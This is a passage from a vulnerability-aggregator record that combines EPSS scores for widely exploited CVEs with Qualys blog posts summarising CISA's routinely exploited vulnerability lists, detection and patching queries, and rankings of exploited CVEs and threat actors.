"WALLARMLAB:C5940EBF622709A929825B8B12592EF5", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:107445D672F037011ADA9A0DA9FB8292", "WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdi", "idList": ["ZDI-20-258", "ZDI-21-819", "ZDI-21-821", "ZDI-21-822"]}, {"type": "zdt", "idList": ["1337DAY-ID-27607", "1337DAY-ID-27617", "1337DAY-ID-27662", "1337DAY-ID-28811", "1337DAY-ID-29022", "1337DAY-ID-29119", "1337DAY-ID-33133", "1337DAY-ID-33134", "1337DAY-ID-33140", "1337DAY-ID-33683", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-34553", "1337DAY-ID-35085", "1337DAY-ID-35274", "1337DAY-ID-35741", "1337DAY-ID-35772", "1337DAY-ID-35779", "1337DAY-ID-35785", "1337DAY-ID-35863", "1337DAY-ID-35879", "1337DAY-ID-35912", "1337DAY-ID-35944", "1337DAY-ID-36024", "1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36472", "1337DAY-ID-36558", "1337DAY-ID-36564", "1337DAY-ID-36667", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37051", "1337DAY-ID-37080", "1337DAY-ID-37126", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37230", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37781", 
### EPSS scores for the CVEs in this advisory

The following Exploit Prediction Scoring System (EPSS) values were attached to this record by the Vulners aggregator, not by the advisory's authors. Each row gives the EPSS probability-of-exploitation score, its percentile across all scored CVEs, and the date the score was last updated. EPSS is a point-in-time estimate; these values are from May 2023 and will have changed since.

| CVE | EPSS | Percentile | Modified |
|---|---|---|---|
| CVE-2017-0199 | 0.97449 | 0.99908 | 2023-05-01 |
| CVE-2017-11882 | 0.9743 | 0.99887 | 2023-05-02 |
| CVE-2018-0171 | 0.88904 | 0.98157 | 2023-05-02 |
| CVE-2018-13379 | 0.97505 | 0.99963 | 2023-05-02 |
| CVE-2019-11510 | 0.97517 | 0.99972 | 2023-05-02 |
| CVE-2019-18935 | 0.8927 | 0.98183 | 2023-05-02 |
| CVE-2019-19781 | 0.975 | 0.99956 | 2023-05-02 |
| CVE-2020-0688 | 0.97379 | 0.99829 | 2023-05-02 |
| CVE-2020-1472 | 0.97362 | 0.99808 | 2023-05-01 |
| CVE-2020-2509 | 0.00179 | 0.53532 | 2023-05-01 |
| CVE-2021-1675 | 0.96888 | 0.99507 | 2023-05-01 |
| CVE-2021-20016 | 0.02531 | 0.88593 | 2023-05-01 |
| CVE-2021-20038 | 0.93351 | 0.98573 | 2023-05-02 |
| CVE-2021-21972 | 0.97426 | 0.99883 | 2023-05-01 |
| CVE-2021-21985 | 0.9745 | 0.99909 | 2023-05-01 |
| CVE-2021-22893 | 0.9698 | 0.99559 | 2023-05-01 |
| CVE-2021-26084 | 0.97475 | 0.99938 | 2023-05-01 |
| CVE-2021-26855 | 0.97532 | 0.99982 | 2023-05-01 |
| CVE-2021-26857 | 0.07213 | 0.92995 | 2023-05-01 |
| CVE-2021-26858 | 0.11092 | 0.94264 | 2023-05-01 |
| CVE-2021-27065 | 0.95076 | 0.98886 | 2023-05-01 |
| CVE-2021-27101 | 0.00785 | 0.7889 | 2023-05-01 |
| CVE-2021-27102 | 0.00083 | 0.33889 | 2023-05-01 |
| CVE-2021-27103 | 0.01096 | 0.82292 | 2023-05-01 |
| CVE-2021-27104 | 0.00819 | 0.79412 | 2023-05-01 |
| CVE-2021-27852 | 0.01106 | 0.82357 | 2023-05-01 |
| CVE-2021-31207 | 0.97157 | 0.9965 | 2023-05-01 |
| CVE-2021-3156 | 0.94383 | 0.98743 | 2023-05-01 |
| CVE-2021-34473 | 0.97375 | 0.99825 | 2023-05-01 |
| CVE-2021-34523 | 0.97463 | 0.99924 | 2023-05-01 |
| CVE-2021-34527 | 0.9685 | 0.99482 | 2023-05-01 |
| CVE-2021-35464 | 0.97391 | 0.99847 | 2023-05-01 |
| CVE-2021-40444 | 0.96903 | 0.99515 | 2023-05-02 |
| CVE-2021-40539 | 0.97508 | 0.99968 | 2023-05-02 |
| CVE-2021-42237 | 0.97546 | 0.99991 | 2023-05-02 |
| CVE-2021-44228 | 0.97581 | 0.99999 | 2023-05-02 |

Note the outliers: CVE-2020-2509, CVE-2021-27102, CVE-2021-27101, CVE-2021-27103, CVE-2021-27104, CVE-2021-27852 and CVE-2021-20016 all carry EPSS scores below 0.03 even though this advisory lists them as exploited in the wild. A patching policy driven by EPSS alone would deprioritise them; treat EPSS as a complement to, not a substitute for, a known-exploited list such as this one.
{"qualysblog": [{"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. 
are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence 
Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted string that Log4j resolved through a JNDI lookup, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4j and were vulnerable to Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n#### ProxyShell: Multiple Vulnerabilities\n\nThe set of vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affects Microsoft Exchange email servers. 
Successful exploitation of these vulnerabilities in combination (i.e., via \u201cvulnerability chaining\u201d) enables a remote actor to execute arbitrary code and escalate privileges.\n\n#### ProxyLogon: Multiple Vulnerabilities\n\nThe set of vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affects Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object-Graph Navigation Language (OGNL) injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. 
[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities, which account for nine of the 15 (60%). Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nView vulnerabilities by severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as it propagates across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\nQualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. 
You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nPrioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\nUsing Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. 
The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. 
Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Secure| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5 BIG-IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Microsoft (Netlogon)| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. 
You can search for these QIDs in the VMDR Dashboard using the following QQL query:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-26855`, `CVE-2021-26857`, `CVE-2021-26858`, `CVE-2021-27065`, `CVE-2021-22893`, `CVE-2021-22894`, `CVE-2021-22899`, `CVE-2021-22900`, `CVE-2021-27101`, `CVE-2021-27102`, `CVE-2021-27103`, `CVE-2021-27104`, `CVE-2021-21985`, `CVE-2018-13379`, `CVE-2020-12812`, `CVE-2019-5591`, `CVE-2019-19781`, `CVE-2019-11510`, `CVE-2020-5902`, `CVE-2020-15505`, `CVE-2017-11882`, `CVE-2019-11580`, `CVE-2019-18935`, `CVE-2019-0604`, `CVE-2020-0787`, `CVE-2020-1472`]\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can prioritize these vulnerabilities using the \u201cActive Attack\u201d real-time threat indicator (RTI):\n\nWith the VMDR Dashboard, you can track the top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can follow how these vulnerabilities trend in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n### Recommendations\n\nCISA recommends the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Monitor closely for indicators of compromise (IOCs) and maintain strict reporting processes.\n * Conduct regular incident response exercises at the organizational level as a proactive measure.\n * Require multi-factor authentication for remote access to networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching the vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * 
Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", 
"CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-08T15:22:18", "description": "The [previous blog](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>) from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) often fall short in identifying high-risk vulnerabilities. \n\nIn this blog, we will focus on an **insider's perspective on the threat landscape**, viewing it through the eyes of an attacker. We will examine how quickly vulnerabilities get exploited in the wild, identify popularly sought-after vulnerabilities by threat actors, malware, and ransomware groups, and explore their underlying motives. \n\nWe will also provide insights on what measures to take you can take to safeguard your organizations from these vulnerabilities. \n\nSo, let's dive headfirst into this intriguing world without further ado. \n\n### How Fast Are Vulnerabilities Getting Exploited (Time to CISA KEV)?\n\nWe've already highlighted one of the most noteworthy efforts by the team at CISA - the creation of the known exploited vulnerabilities catalog in our previous blog. Initiated as part of [Binding Operational Directive 22-01 in 2021](<https://www.cisa.gov/news-events/directives/binding-operational-directive-22-01>), this project was born out of the need to minimize risks associated with these vulnerabilities. In its early years, there was a substantial backlog to address. 
Still, by 2023, the CISA team had the operation running like a well-oiled machine, swiftly updating the catalog with newly exploited vulnerabilities as soon as evidence emerges. \n\nSo, let's look at how quickly vulnerabilities get exploited in the wild after they are disclosed in the National Vulnerability Database (NVD).\n\nThe following graph illustrates the average time it takes for a vulnerability to be added to the Known Exploited Vulnerabilities (KEV) catalog after it is published in NVD.\n\nFor CVEs disclosed in 2023, the average **time to KEV was just eight days**.\n\nFig 1. Average Time in Days to CISA KEV Catalog\n\nDefenders, therefore, have limited time to respond. The only viable response is automated patching of these vulnerabilities before attackers can exploit them. Note that eight days is an average; in some instances, vulnerabilities are exploited almost instantly.\n\n### Which Vulnerabilities Are Exploited and by Whom?\n\nSo which vulnerabilities are exploited in the wild? And who is exploiting them? Are there any specific vulnerabilities that are more sought after than others? If so, which ones?\n\nTo answer these questions, let's examine three main groups of attackers.\n\n * Threat actor groups\n * Malware\n * Ransomware groups\n\nAlthough there is some overlap, each group appears to favor a slightly different set of vulnerabilities depending on the use case.\n\n## Top Ten Vulnerabilities Exploited by Threat Actors\n\nHere\u2019s a list of the top ten vulnerabilities exploited by threat actors.\n\nThe chart below shows **the number of threat actors known to exploit a given vulnerability**.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-2-Top-10-Vulnerabilities-Exploited-by-Threat-Actors.png>)Fig 2. 
Top Ten Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n**Title** | **CVE** | **Threat Actor Count** | **TruRisk Score (QVS)** | **Description** \n---|---|---|---|--- \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 53 | 100 | Allows a malicious actor to download a Visual Basic script containing PowerShell commands. Works reliably across a wide attack surface. Popular with [APT groups](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>). \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 52 | 100 | Exploits Office's default Equation Editor feature by tricking the user into opening a malicious file. A favorite of criminal groups such as Cobalt, and of malware, as the next section shows. \nWindows Common Controls Remote Code Execution Vulnerability | CVE-2012-0158 | 45 | 100 | Executes remote code by tricking the user into clicking a malicious link or opening a specially crafted file. \nApache Log4j RCE (Log4Shell) | CVE-2021-44228 | 26 | 100 | [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>). Do we need to say anything more? \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 24 | 100 | Executes remote code by tricking the user into opening a specially crafted file in Office or WordPad. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 22 | 100 | Server-side request forgery that lets an unauthenticated attacker authenticate as the Exchange server; chained with CVE-2021-27065 it gives remote code execution in the default configuration. Heavily exploited by the [Hafnium](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group among others. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 20 | 100 | Pre-authentication path confusion that lets an unauthenticated attacker reach Exchange backend endpoints. 
Chained with CVE-2021-34523 and CVE-2021-31207 it yields remote code execution, making it attractive to cybercriminals. \nMicrosoft Exchange Server Arbitrary File Write Vulnerability (ProxyLogon) | CVE-2021-27065 | 19 | 95 | Post-authentication arbitrary file write in Exchange. Leveraged as part of the attack chain once an attacker has initial access (for example via CVE-2021-26855). Exploited by the Hafnium group among others. \nMicrosoft Exchange Server Elevation of Privilege Vulnerability (ProxyShell) | CVE-2021-34523 | 17 | 100 | Elevation of privilege in the Exchange PowerShell backend. Chained with CVE-2021-34473 and CVE-2021-31207 it yields remote code execution, making it attractive to cybercriminals. \nMicrosoft Exchange Server Security Feature Bypass Vulnerability (ProxyShell) | CVE-2021-31207 | 17 | 95 | Post-authentication arbitrary file write via mailbox export. Chained with CVE-2021-34473 and CVE-2021-34523 it yields remote code execution, making it attractive to cybercriminals. \n \nTable 1. Top 10 Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n## Top Ten Highly Active Threat Actors\n\nNext, let\u2019s look at some of the most active threat actors, those known to leverage the largest number of vulnerabilities in their arsenal to compromise systems across the globe.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-3-Most-Active-Threat-Actors.png>)Fig 3. Most Active Threat Actors for High-Risk Vulnerabilities\n\n**Threat Actor** | **CVEs Exploited** | **Description** \n---|---|--- \nEquation Group | 51 | Uses a variety of malware, including backdoors, trojans, and rootkits, often targeting zero-day vulnerabilities. Such malware is often challenging to detect and remove. \nFancy Bear | 44 | Best known as APT28 or Sofacy, it uses advanced malware and spear-phishing tactics. The group is also known for using \u201cwatering hole\u201d attacks. 
